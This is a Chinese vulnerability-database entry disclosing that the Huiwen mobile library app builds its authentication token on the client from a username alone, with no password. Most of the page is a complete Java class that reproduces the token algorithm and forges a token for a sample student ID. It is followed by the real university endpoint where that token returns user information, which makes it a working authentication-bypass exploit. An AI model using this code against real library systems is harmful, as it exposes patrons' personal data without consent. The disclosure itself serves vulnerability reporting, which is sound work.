|汇文手机图书馆不用密码获取用户信息 - VULHUB开源网络安全威胁库

汇文手机图书馆不用密码获取用户信息

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：生成认证token，只用用户名即可获取用户信息 ### 详细说明：将用于认证的token的生成方式在客户端实现且生成方式与密码无关影响院校列表 http://www.libsys.com.cn/huiwen_app_center_2.php ### 漏洞证明： ``` import java.io.UnsupportedEncodingException; import java.math.BigInteger; /** * Created by snail on 14-11-23. */ public class LibToken { public static String makeToken(String s) { int k, l, i1, j1, k1; String s1, s2, s3, s4, s5; StringBuffer stringBuffer; byte abyte0[] = null; try { abyte0 = s.getBytes("utf-8"); } catch (UnsupportedEncodingException e) { return null; } s1 = ""; for (l = 0; l < abyte0.length; l++) { s2 = Integer.toHexString(0xff & abyte0[l]); if (s2.length() == 1) { s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString(); } else { s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString(); } // System.out.println(l+"-->s1-->"+s1+"s2-->"+s2); } //System.out.println("s1------>"+s1); s4 = s1.toUpperCase(); stringBuffer = new StringBuffer(""); for (i1 = 0; i1 < s4.length(); i1++) { stringBuffer.append(s4.charAt(i1)); if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) { stringBuffer.append((int) (10D * Math.random())); } } //System.out.println("stringBuffer.toString()--->"+stringBuffer.toString()); s5 = b(stringBuffer.toString()); //System.out.println("s5--->"+s5); j1 = 0; for (k = 0; k < s5.length(); k++) { j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString()); } //System.out.println("j1---->"+j1); k1 = j1 % 36; if ((k1 <= 10) || (k1 == 16)) k1 = 18; return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString(); } public static String a(String s, int k) { //System.out.println("s--->"+s+"---k-->-"+k); BigInteger bigIntegerArray[] = new BigInteger[500]; for (int l = 0; l < 100; l++) { bigIntegerArray[l] = new BigInteger("0"); } BigInteger bi, bi1, bi2; bi = new BigInteger(s); bi1 = new BigInteger(String.valueOf(k)); bi2 = bi; int i1; for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) { bigIntegerArray[i1] = bi2.mod(bi1); bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1); } for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) { BigInteger bi3 = bigIntegerArray[k1]; bigIntegerArray[k1] = bigIntegerArray[j1]; bigIntegerArray[j1] = bi3; } String s1 = ""; for (int l1 = 0; l1 < i1; l1++) { s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString(); } //System.out.println("s1-->"+s1); return s1; } public static String a(long l) { if (l < 10L) { //System.out.println("a00--->"+String.valueOf(l)); return String.valueOf(l); } if (l < 36L) { //System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L)))); return String.valueOf((char) (int) (65L + (l - 10L))); } else return ""; } public static String b(String s) { BigInteger bi1 = new BigInteger(String.valueOf(16)); BigInteger bi2 = new BigInteger("0"); BigInteger bi3 = bi2; for (int k = 0; k < s.length(); k++) { char c1 = s.charAt(k); int m; if ((c1 >= '0') && (c1 <= '9')) { m = Integer.parseInt(String.valueOf(c1)); } else if ((c1 >= 'A') && (c1 <= 'Z')) { m = 10 + (c1 - 'A'); } else { m = -1; } bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m)))); } //System.out.println("bi3-->"+bi3.toString()); return bi3.toString(); } public static void main(String[] args){ System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学")); } } ``` 将生成的token用到 http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™